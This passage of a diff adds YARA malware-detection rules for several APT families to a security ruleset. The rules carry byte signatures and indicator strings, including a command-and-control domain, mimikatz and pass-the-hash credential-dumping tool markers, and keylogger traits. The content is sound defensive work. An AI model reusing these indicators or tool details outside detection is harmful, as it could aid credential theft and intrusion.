+        $c = /\/[A-Za-z]*\?hl=en/
+
+    condition: 
+        (($a1 or $a2) or $b) and $c
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Molerats.yar remnux-rules-0.0.4/yara/malware/APT_Molerats.yar
--- remnux-rules-0.0.3/yara/malware/APT_Molerats.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Molerats.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Molerats_certs
+{
+    meta:
+        Author      = "FireEye Labs"
+        Date        = "2013/08/23"
+        Description = "this rule detections code signed with certificates used by the Molerats actor"
+        Reference   = "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
+
+    strings:
+        $cert1 = { 06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75 }
+        $cert2 = { 03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28 }
+        $cert3 = { 0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d }
+
+    condition:
+        1 of ($cert*)
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Mongall.yar remnux-rules-0.0.4/yara/malware/APT_Mongall.yar
--- remnux-rules-0.0.3/yara/malware/APT_Mongall.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Mongall.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,68 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Backdoor_APT_Mongal
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Backdoor.APT.Mongall"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$author  = "author user"
+	$title   = "title Vjkygdjdtyuj" nocase
+	$comp    = "company ooo"
+	$cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
+	$passwd  = "password 00000000"
+condition:
+        all of them
+}
+
+rule MongalCode : Mongal Family 
+{
+    meta:
+        description = "Mongal code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+    
+    strings:
+        // gettickcount value checking
+        $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
+        
+    condition:
+        any of them
+}
+
+rule MongalStrings : Mongal Family
+{
+    meta:
+        description = "Mongal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    strings:
+        $ = "NSCortr.dll"
+        $ = "NSCortr1.dll"
+        $ = "Sina.exe"
+        
+    condition:
+        any of them
+}
+
+rule Mongal : Family
+{
+    meta:
+        description = "Mongal"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    condition:
+        MongalCode or MongalStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT_NGO_wuaclt.yar remnux-rules-0.0.4/yara/malware/APT_NGO_wuaclt.yar
--- remnux-rules-0.0.3/yara/malware/APT_NGO_wuaclt.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_NGO_wuaclt.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_NGO_wuaclt
+{
+   meta:
+    author = "AlienVault Labs"
+  strings:
+    $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
+    $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+    $c = "/news/show.asp?id%d=%d"
+    
+	$d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
+	$e = "0l23kj@nboxu"
+	
+	$f = "%%s.asp?id=%%d&Sid=%%d"
+	$g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
+	$h = "Cookies: UseID=KGIOODAOOK%%s"
+
+  condition:
+    ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
+}
+
+rule APT_NGO_wuaclt_PDF
+{
+    	meta:
+        	author = "AlienVault Labs"
+
+	strings:
+		$pdf  = "%PDF" nocase
+		$comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A}
+	
+	condition:
+		$pdf at 0 and $comment in (0..200)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_OLE_JSRat.yar remnux-rules-0.0.4/yara/malware/APT_OLE_JSRat.yar
--- remnux-rules-0.0.3/yara/malware/APT_OLE_JSRat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_OLE_JSRat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule APT_OLE_JSRat
+{
+meta:
+	author = "Rahul Mohandas"
+	Date = "2015-06-16"
+	Description = "Targeted attack using Excel/word documents"
+strings:
+	$header = {D0 CF 11 E0 A1 B1 1A E1}
+	$key1 = "AAAAAAAAAA"
+	$key2 = "Base64Str" nocase
+	$key3 = "DeleteFile" nocase
+	$key4 = "Scripting.FileSystemObject" nocase
+condition:
+	$header at 0 and (all of ($key*) )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_OPCleaver.yar remnux-rules-0.0.4/yara/malware/APT_OPCleaver.yar
--- remnux-rules-0.0.3/yara/malware/APT_OPCleaver.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_OPCleaver.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,279 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ZhoupinExploitCrew
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "zhoupin exploit crew" nocase
+    $s2 = "zhopin exploit crew" nocase
+  condition:
+  	1 of them
+}
+
+rule BackDoorLogger
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "BackDoorLogger"
+    $s2 = "zhuAddress"
+  condition:
+    all of them
+}
+
+rule Jasus
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "pcap_dump_open"
+    $s2 = "Resolving IPs to poison..."
+    $s3 = "WARNNING: Gateway IP can not be found"
+  condition:
+    all of them
+}
+
+rule LoggerModule
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "%s-%02d%02d%02d%02d%02d.r"
+    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+  condition:
+    all of them
+}
+
+rule NetC
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetC.exe" wide
+    $s2 = "Net Service"
+  condition:
+    all of them
+}
+
+rule ShellCreator2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "ShellCreator2.Properties"
+    $s2 = "set_IV"
+  condition:
+    all of them
+}
+
+rule SmartCopy2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "SmartCopy2.Properties"
+    $s2 = "ZhuFrameWork"
+  condition:
+    all of them
+}
+
+rule SynFlooder
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+    $s2 = "your target's IP is : %s"
+    $s3 = "Raw TCP Socket Created successfully."
+  condition:
+    all of them
+}
+
+rule TinyZBot
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetScp" wide
+    $s2 = "TinyZBot.Properties.Resources.resources"
+
+    $s3 = "Aoao WaterMark"
+    $s4 = "Run_a_exe"
+    $s5 = "netscp.exe"
+
+    $s6 = "get_MainModule_WebReference_DefaultWS"
+    $s7 = "remove_CheckFileMD5Completed"
+    $s8 = "http://tempuri.org/"
+
+    $s9 = "Zhoupin_Cleaver"
+  condition:
+    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
+}
+
+rule antivirusdetector
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule csext
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "COM+ System Extentions"
+    $s2 = "csext.exe"
+    $s3 = "COM_Extentions_bin"
+  condition:
+    all of them
+}
+
+rule kagent
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "kill command is in last machine, going back"
+    $s2 = "message data length in B64: %d Bytes"
+  condition:
+    all of them
+}
+
+rule mimikatzWrapper
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "mimikatzWrapper"
+    $s2 = "get_mimikatz"
+  condition:
+    all of them
+}
+
+rule pvz_in
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
+    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+  condition:
+    all of them
+}
+
+rule pvz_out
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Network Connectivity Module" wide
+    $s2 = "OSPPSVC" wide
+  condition:
+    all of them
+}
+
+rule wndTest
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "[Alt]" wide
+    $s2 = "<< %s >>:" wide
+    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+  condition:
+    all of them
+}
+
+rule zhCat
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhCat -l -h -tp 1234"
+    $s2 = "ABC ( A Big Company )" wide
+  condition:
+    all of them
+}
+
+rule zhLookUp
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhLookUp.Properties"
+  condition:
+    all of them
+}
+
+rule zhmimikatz
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "MimikatzRunner"
+    $s2 = "zhmimikatz"
+  condition:
+    all of them
+}
+
+rule Zh0uSh311
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "Zh0uSh311"
+  condition:
+  	all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_passthehashtoolkit.yar remnux-rules-0.0.4/yara/malware/APT_passthehashtoolkit.yar
--- remnux-rules-0.0.3/yara/malware/APT_passthehashtoolkit.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_passthehashtoolkit.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,136 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule whosthere_alt {
+	meta:
+		description = "Auto-generated rule - file whosthere-alt.exe"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
+	strings:
+		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '49.00' */
+		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */
+		$s2 = "dump output to a file, -o filename" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
+		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii /* PEStudio Blacklist: strings */ /* score: '29.00' */
+		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii /* score: '24.00' */
+		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s6 = ".\\pth.dll" fullword ascii /* score: '16.00' */
+		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 280KB and 2 of them
+}
+
+rule iam_alt_iam_alt {
+	meta:
+		description = "Auto-generated rule - file iam-alt.exe"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
+	strings:
+		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */
+		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '43.00' */
+		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.00' */
+		$s3 = "username:domainname:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
+		$s4 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */
+		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii /* score: '12.00' */
+		$s6 = "nthash is too long!." fullword ascii /* score: '8.00' */
+		$s7 = "LSASS HANDLE: %x" fullword ascii /* score: '5.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
+}
+
+rule genhash_genhash {
+	meta:
+		description = "Auto-generated rule - file genhash.exe"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
+	strings:
+		$s1 = "genhash.exe <password>" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
+		$s3 = "Password: %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii /* score: '11.00' */
+		$s5 = "This tool generates LM and NT hashes." fullword ascii /* score: '10.00' */
+		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii /* score: '10.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule iam_iamdll {
+	meta:
+		description = "Auto-generated rule - file iamdll.dll"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
+	strings:
+		$s0 = "LSASRV.DLL" fullword ascii /* score: '21.00' */
+		$s1 = "iamdll.dll" fullword ascii /* score: '21.00' */
+		$s2 = "ChangeCreds" fullword ascii /* score: '12.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 115KB and all of them
+}
+
+rule iam_iam {
+	meta:
+		description = "Auto-generated rule - file iam.exe"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
+	strings:
+		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */
+		$s2 = "iam.exe -h administrator:mydomain:"  ascii /* PEStudio Blacklist: strings */ /* score: '40.00' */
+		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii /* PEStudio Blacklist: strings */ /* score: '33.00' */
+		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
+		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii /* score: '26.00' */
+		$s6 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */
+		$s7 = "Checking LSASRV.DLL...." fullword ascii /* score: '12.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule whosthere_alt_pth {
+	meta:
+		description = "Auto-generated rule - file pth.dll"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
+	strings:
+		$s0 = "c:\\debug.txt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */
+		$s1 = "pth.dll" fullword ascii /* score: '20.00' */
+		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii /* score: '7.00' */
+		$s3 = "\"Primary\" string not found!" fullword ascii /* score: '6.00' */
+		$s4 = "segment 1 found at %.8Xh" fullword ascii /* score: '6.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 240KB and 4 of them
+}
+
+rule whosthere {
+	meta:
+		description = "Auto-generated rule - file whosthere.exe"
+		author = "Florian Roth"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		date = "2015-07-10"
+		score = 80
+		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
+	strings:
+		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '48.00' */
+		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */
+		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */
+		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
+		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
+		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 320KB and 2 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_pcclient.yar remnux-rules-0.0.4/yara/malware/APT_pcclient.yar
--- remnux-rules-0.0.3/yara/malware/APT_pcclient.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_pcclient.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule backdoor_apt_pcclient
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.PCCLient"
+	filetype = "DLL"
+	version = "0.1"
+	description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
+	date = "2012-10"
+strings:
+	$magic = { 4d 5a } // MZ
+	$string1 = "www.micro1.zyns.com"
+	$string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
+	$string3 = "msacm32.drv" wide
+	$string4 = "C:\\Windows\\Explorer.exe" wide
+	$string5 = "Elevation:Administrator!" wide
+	$string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
+condition:
+	$magic at 0 and 4 of ($string*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Platinum.yar remnux-rules-0.0.4/yara/malware/APT_Platinum.yar
--- remnux-rules-0.0.3/yara/malware/APT_Platinum.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Platinum.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,339 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Trojan_Win32_PlaSrv : Platinum
+{
+meta:
+    author = "Microsoft"
+    description = "Hotpatching Injector"
+    original_sample_sha1 = "ff7f949da665ba8ce9fb01da357b51415634eaad"
+    unpacked_sample_sha1 = "dff2fee984ba9f5a8f5d97582c83fca4fa1fe131"
+    activity_group = "Platinum"
+    version = "1.0"
+    last_modified = "2016-04-12"
+strings:
+    $Section_name = ".hotp1"
+    $offset_x59 = { C7 80 64 01 00 00 00 00 01 00 }
+    condition:
+    $Section_name and $offset_x59
+}
+rule Trojan_Win32_Platual : Platinum
+{
+meta:
+    author = "Microsoft"
+    description = "Installer component"
+    original_sample_sha1 = "e0ac2ae221328313a7eee33e9be0924c46e2beb9"
+    unpacked_sample_sha1 = "ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a"
+    activity_group = "Platinum"
+    version = "1.0"
+    last_modified = "2016-04-12"
+strings:
+    $class_name = "AVCObfuscation"
+    $scrambled_dir = { A8 8B B8 E3 B1 D7 FE 85 51 32 3E C0 F1 B7 73 99 }
+condition:
+$class_name and $scrambled_dir
+}
+rule Trojan_Win32_Plaplex : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Variant of the JPin backdoor"
+original_sample_sha1 = "ca3bda30a3cdc15afb78e54fa1bbb9300d268d66"
+unpacked_sample_sha1 = "2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$class_name1 = "AVCObfuscation"
+$class_name2 = "AVCSetiriControl"
+condition:
+$class_name1 and $class_name2
+}
+rule Trojan_Win32_Dipsind_B : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Dipsind Family"
+sample_sha1 = "09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$frg1 = {8D 90 04 01 00 00 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 4D EC 8B 15 ?? ?? ?? ?? 89 91 ?? 07 00 00 }
+$frg2 = {68 A1 86 01 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA}
+$frg3 = {C0 E8 07 D0 E1 0A C1 8A C8 32 D0 C0 E9 07 D0 E0 0A C8 32 CA 80 F1 63}
+condition:
+$frg1 and $frg2 and $frg3
+}
+rule Trojan_Win32_PlaKeylog_B : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Keylogger component"
+original_sample_sha1 = "0096a3e0c97b85ca75164f48230ae530c94a2b77"
+unpacked_sample_sha1 = "6a1412daaa9bdc553689537df0a004d44f8a45fd"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$hook = {C6 06 FF 46 C6 06 25}
+$dasm_engine = {80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05}
+condition:
+$hook and $dasm_engine
+}
+rule Trojan_Win32_Adupib : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Adupib SSL Backdoor"
+original_sample_sha1 = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
+unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "POLL_RATE"
+$str2 = "OP_TIME(end hour)"
+$str3 = "%d:TCP:*:Enabled"
+$str4 = "%s[PwFF_cfg%d]"
+$str5 = "Fake_GetDlgItemTextW: ***value***="
+condition:
+$str1 and $str2 and $str3 and $str4 and $str5
+}
+rule Trojan_Win32_PlaLsaLog : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Loader / possible incomplete LSA Password Filter"
+original_sample_sha1 = "fa087986697e4117c394c9a58cb9f316b2d9f7d8"
+unpacked_sample_sha1 = "29cb81dbe491143b2f8b67beaeae6557d8944ab4"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {8A 1C 01 32 DA 88 1C 01 8B 74 24 0C 41 3B CE 7C EF 5B 5F C6 04 01 00 5E 81 C4 04 01 00 00 C3}
+$str2 = "PasswordChangeNotify"
+condition:
+$str1 and $str2
+}
+rule Trojan_Win32_Plagon : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Dipsind variant"
+original_sample_sha1 = "48b89f61d58b57dba6a0ca857bce97bab636af65"
+unpacked_sample_sha1 = "6dccf88d89ad7b8611b1bc2e9fb8baea41bdb65a"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "VPLRXZHTU"
+$str2 = {64 6F 67 32 6A 7E 6C}
+$str3 = "Dqpqftk(Wou\"Isztk)"
+$str4 = "StartThreadAtWinLogon"
+condition:
+$str1 and $str2 and $str3 and $str4
+}
+rule Trojan_Win32_Plakelog : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Raw-input based keylogger"
+original_sample_sha1 = "3907a9e41df805f912f821a47031164b6636bd04"
+unpacked_sample_sha1 = "960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "<0x02>" wide
+$str2 = "[CTR-BRK]" wide
+$str3 = "[/WIN]" wide
+$str4 = {8A 16 8A 18 32 DA 46 88 18 8B 15 08 E6 42 00 40 41 3B CA 72 EB 5E 5B}
+condition:
+$str1 and $str2 and $str3 and $str4
+}
+rule Trojan_Win32_Plainst : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Installer component"
+original_sample_sha1 = "99c08d31af211a0e17f92dd312ec7ca2b9469ecb"
+unpacked_sample_sha1 = "dcb6cf7cf7c8fdfc89656a042f81136bda354ba6"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {66 8B 14 4D 18 50 01 10 8B 45 08 66 33 14 70 46 66 89 54 77 FE 66 83 7C 77 FE 00 75 B7 8B 4D FC 89 41 08 8D 04 36 89 41 0C 89 79 04}
+$str2 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97}
+condition:
+$str1 and $str2
+}
+rule Trojan_Win32_Plagicom : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Installer component"
+original_sample_sha1 = "99dcb148b053f4cef6df5fa1ec5d33971a58bd1e"
+unpacked_sample_sha1 = "c1c950bc6a2ad67488e675da4dfc8916831239a7"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {C6 44 24 ?? 68 C6 44 24 ?? 4D C6 44 24 ?? 53 C6 44 24 ?? 56 C6 44 24 ?? 00}
+$str2 = "OUEMM/EMM"
+$str3 = {85 C9 7E 08 FE 0C 10 40 3B C1 7C F8 C3}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plaklog : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Hook-based keylogger"
+original_sample_sha1 = "831a5a29d47ab85ee3216d4e75f18d93641a9819"
+unpacked_sample_sha1 = "e18750207ddbd939975466a0e01bd84e75327dda"
+activity_group = "Platinum"
+version = "1.0"
